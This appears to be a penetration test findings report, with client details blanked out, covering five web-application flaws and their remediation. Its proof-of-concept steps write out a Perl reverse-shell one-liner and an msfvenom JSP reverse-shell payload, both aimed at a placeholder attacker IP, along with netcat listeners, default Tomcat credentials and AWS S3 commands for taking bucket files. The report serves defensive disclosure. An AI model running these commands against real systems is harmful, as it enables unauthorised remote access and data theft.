Security Assessment Findings Report

Confidential

Date:

Penetration Tester: Erik Santana

Version

Security Assessment Findings Report for

Contents
Contact Information ................................................................................................................................... 3
Executive Summary..................................................................................................................................... 3
Engagement Scope ..................................................................................................................................... 3
Engagement Scope Exclusions .................................................................................................................... 3
Testing Notes .............................................................................................................................................. 3
Severity Ratings .......................................................................................................................................... 4
Vulnerability Summary ............................................................................................................................... 5
Penetration Test Findings ....................................................................................................................... 5
Technical Findings ....................................................................................................................................... 6
Internal Penetration Test Findings .......................................................................................................... 6
Finding 01 – Injection .......................................................................................................................... 6
Finding 02 – Broken Access Control .................................................................................................... 8
Finding 03 – Identification and Authentication Failures ................................................................... 10
Finding 04 – Identification and Authentication Failures ................................................................... 13
Finding 05 – Broken Access Control .................................................................................................. 17

Security Assessment Findings Report for

Contact Information
Title Name Contact Information
Penetration Tester Erik Santana Email:

Executive Summary
The penetration tester was tasked by to perform a security assessment from
This was completed via the . During the
assessment, the security posture of devices . As requested by , only the
will be included as part of this report.

Engagement Scope
The scope of the engagement was limited to the following targets
:

. The access was limited to .

Engagement Scope Exclusions

There were no exclusions defined by . No Denial-of-Service Attacks (DoS), phishing, or social
engineering attacks were attempted during the test.

Testing Notes
During testing for , in addition to , the server presents a possible
SQL Injection vulnerability. During testing, basic SQL injection commands were observed and registered.
This vulnerability was not included as part of the report because it did not lead to a full server
compromise, but it is something we want the security development team to be aware of so that
remediate the issue promptly.

Security Assessment Findings Report for

 Figure 1 - SQL injection in Insert parameter allowed posting as another user and to gather database and system details.

Severity Ratings
The following table defines levels of severity and corresponding CVSS score range that is used
throughout the document to assess vulnerability and risk impact.

Security Assessment Findings Report for

Vulnerability Summary
Penetration Test Findings
Based on OWASP Top 10

Finding Severity Recommendation

A03:2021 – Injection Critical Use positive server-side input
validation.
A01:2021 – Broken Access Critical Implement access control
Control mechanisms.
A07:2021 – Identification and Critical Implement hardened password
Authentication Failures recovery features.
A05:2021 – Identification and Critical Reconfigure default accounts
Authentication Failures and passwords.
A03:2021 – Broken Access High Disable web server directory
Control listing and make sure that
backup files are not present
within web roots.

Security Assessment Findings Report for

Technical Findings
Internal Penetration Test Findings
Finding 01 – Injection
Description The vulnerable web page allows a malicious
attacker to run unvalidated commands

Criticality Critical – This vulnerability is effective in allowing

compromise of the web server. This also in
turn allowed access to an Amazon AWS S3 bucket
which makes the system an attack vector for
other systems in the network.
References CWE-20: Improper Input Validation:
https://cwe.mitre.org/data/definitions/20.html

A03:2021 – Injection:
https://owasp.org/Top10/A03_2021-Injection/

Proof of Concept

Note: This includes steps to follow by security development team.

Host:

Steps:

1. Using a browser like Firefox navigate to

2. Notice that the website has an entry that allows direct command injection into the server
without sanitation of any type and (Fig.2). We proceed to get a stable remote
shell to further analyze the system.
3. On the attacking system, establish a listener using netcat: rlwrap nc -lvnp 4444
4. On the victim system, run the following command to gain stable remote shell access: perl -e 'use
Socket;$i="ATTACKER_IP";$p=ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobynam
e("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");o
pen(STDERR,">&S");exec("/bin/sh -i");};'
5. Next, we use a one-liner from the LinPEAS - Linux Privilege Escalation Awesome Script page to
gather intelligence on the system.
6. LinPEAS reports that there are AWS credentials in the system.
7. Using this information, we check for any AWS S3 buckets. A bucket is shown by the system using
the following command: aws --endpoint-url s3 ls
8. We proceed to list the files inside the bucket with the command: aws --endpoint-url
s3 ls --recursive --human-readable --summarize s3:/

Security Assessment Findings Report for

 9. We download the files inside the share with the command: aws --endpoint-url
s3 cp s3:/ , at which point the system is
compromised.

Evidence:

Figure 2 - Access to command line as

Figure 3 - Remote shell access

Figure 4 - AWS credentials

Figure 5 - Accessing AWS S3 Bucket

Remediation

It is recommended to use positive server-side input validation. Also, to limit and validate user input. In
this case, the preferable option would be to not allow direct access to the command line via the web
page. Instead, just show the output of required data via parametrized options.
.

Security Assessment Findings Report for

Finding 02 – Broken Access Control
Description The vulnerable GraphQL API have missing/broken
access controls. In this instance, the and
APIs use in combination, allow
extraction of a privileged users account JWT
(JSON Web Token) without proper validation. The
API allows for user data extraction
without additional validation. the
allows an attacker to request a JWT without a
password or any other type of unique
identification, just the information supplied by
the API.
Criticality Critical – This vulnerability is effective in allowing
compromise of a privileged account
( ).
References CWE-200: Exposure of Sensitive Information to an
Unauthorized Actor:
https://cwe.mitre.org/data/definitions/200.html

A01:2021 – Broken Access Control:

https://owasp.org/Top10/A01_2021-
Broken_Access_Control/

Proof of Concept

Note: This includes steps to follow by security development team.

Host:

Steps:

1. Using a proxy application like Burp Suite and a browser like Firefox, navigate to
/.
2. On Burp Suite, navigate to the Proxy >> HTTP History tab and observe that the system is using a
GraphQL API and the webshot.local address.
3. Using a tool like Clairvoyance, we generate a GraphQL schema to further enumerate the
available API commands, since the system does not allow schema introspection:
graphql -o schema.json -w google-10000-english.txt --progress
4. Using a Burp Suite extension called InQL we analyze the endpoint using the outputted schema.
The following APIs are observed: , , and . Note: The API is
obtained by fuzzing during the enumeration phase of the attack.
5. We use the API to gain user data. (Fig. 5)
6. Using the API call we gain a JWT for the privileged user .
7. Using a tool like Postman, we setup an API call with the recently obtained JWT and the
API call, we proceed to compromise .

Security Assessment Findings Report for

Evidence:

Figure 6 - GraphQL API Endpoints data from INQL (Burp Suite)

Figure 7 - API allows for user data extraction without validation.

Figure 8 – Gathering a JWT for user .

Security Assessment Findings Report for

 Figure 9 - Using Postman to access an API with privileged authentication.

Remediation

To secure access to the GraphQL API, developers should validate that the current user has the authority
to view/mutate/modify the data as per their request and enforce authorization controls on endpoints
and edges. It is recommended that a reevaluation of the authentication/authorization controls on the
and is taken into consideration.

Finding 03 – Identification and Authentication Failures

Description The password recovery feature has vulnerability
that allows brute forcing of a user’s
, which in turn allows an
attacker to obtain the compromised account
password. In this instance, the site
.
Criticality Critical – This vulnerability is effective in allowing
the compromise of a privileged account
( ).
References CWE-1390: Weak Authentication:
https://cwe.mitre.org/data/definitions/1390.html

A07:2021 – Identification and Authentication

Failures: https://owasp.org/Top10/A07_2021-
Identification_and_Authentication_Failures/

Security Assessment Findings Report for

Proof of Concept

Note: This includes steps to follow by security development team.

Host:

1. Using a proxy like Burp Suite and a browser like Firefox, navigate to
/forgot.php and attempt to recover the admin password.
2. Go to Burp Suite Proxy => HTTP History tab and right click on the event, and select “Send to
Intruder.”
3. In the Intruder tab, set up the options as detailed in Fig. 11-12. Then proceed to run the attack.
4. You will observe that a response with the user credentials is obtained allowing access to the
privileged user’s account.

Figure 10 - 4-digit recovery

Security Assessment Findings Report for

Figure 11 - Burp Suite Intruder settings

Figure 12 - Burp Suite Intruder settings

Security Assessment Findings Report for

 Figure 13 - user password.

Remediation

Ensure that recovery account methods are complex in nature and not easily guessable via brute-force
attack methods. Limit or increasingly delay failed password recovery attempts. Ensure registration and
credential recovery are hardened against account enumeration attacks by using the same messages for
all outcomes. Log all failures and alert administrators when credential stuffing, brute force, or other
attacks are detected.

Finding 04 – Identification and Authentication Failures

Description The web server has the default credentials in
place for the Apache Tomcat web server
environment via the manager portal.

Security Assessment Findings Report for

 Criticality Critical – This vulnerability allowed remote access
control of the server via the command line
interface.
References CWE-1392: Use of Default Credentials:
https://cwe.mitre.org/data/definitions/1392.html

A07:2021 – Identification and Authentication

Failures: https://owasp.org/Top10/A07_2021-
Identification_and_Authentication_Failures/

Proof of Concept

Note: This includes steps to follow by security development team.

Host:

Steps:

1. Using a network scanner like Nmap Automator, proceed to scan host using the
following command: nmapautomator -H
2. You will notice that the Tomcat management page is accessible. Proceed to login with the
default tomcat:tomcat username and password combination.
3. Generate a Tomcat Web Application Deployment payload using a tool like msfvenom, that will
allow us to further compromise the server: msfvenom -p java/jsp_shell_reverse_tcp
LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f war -o revshell.war
4. On the attacking system, establish a listener using the command: netcat: rlwrap nc -lvnp 4444
5. Upload the file via the management console and you will gain access to the remote system.

Figure 14 - Apache Tomcat Management Console listing in Nmap

Security Assessment Findings Report for

Figure 15 - Default username and password

Security Assessment Findings Report for

 Figure 16 - Tomcat Management Console

Figure 17 - Remote shell access

Remediation

The recommended best practice for Apache Tomcat webserver hardening includes:

Security Assessment Findings Report for

 • Remove Server Banner from HTTP Header
• Change default username and password
• Do not run Tomcat as a root user
• Disable external access to the Tomcat Manager console

Finding 05 – Broken Access Control

Description Web server enumeration revealed the contents
of a system backup file that contained access
credentials for the user. This
allowed entry into the ticket management portal.
Criticality High – This vulnerability allowed access to the
ticket management portal but did not lead to a
full web server compromise.
References CWE-540: Inclusion of Sensitive Information in
Source Code:
https://cwe.mitre.org/data/definitions/540.html

CWE-538: Insertion of Sensitive Information into

Externally-Accessible File or Directory:
https://cwe.mitre.org/data/definitions/538.html

A01:2021 – Broken Access Control:

https://owasp.org/Top10/A01_2021-
Broken_Access_Control/

Proof of Concept

Note: This includes steps to follow by security development team.

Host:

1. Using a directory enumerating tool like Feroxbuster, run the following command: feroxbuster -u
-w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-
medium.txt
2. Notice that the directory /backups is accessible. Inside we find a file called “
” with an MD5 checksum of . Proceed to
download this file.
3. Extract the archive and with a text editor, notice that the credentials for user are
available in the Signin.java file. Use these credentials to log into the ticket management portal.

Evidence:

Security Assessment Findings Report for

Figure 18 - Ferroxbuster scan showing the backups folder availability.

Figure 19- Signin.java file showing user credentials.

Security Assessment Findings Report for

 Figure 20 - Ticketing portal

Remediation

Disable web server directory listing and make sure that backup files are not present within web roots.

Security Assessment Findings Report for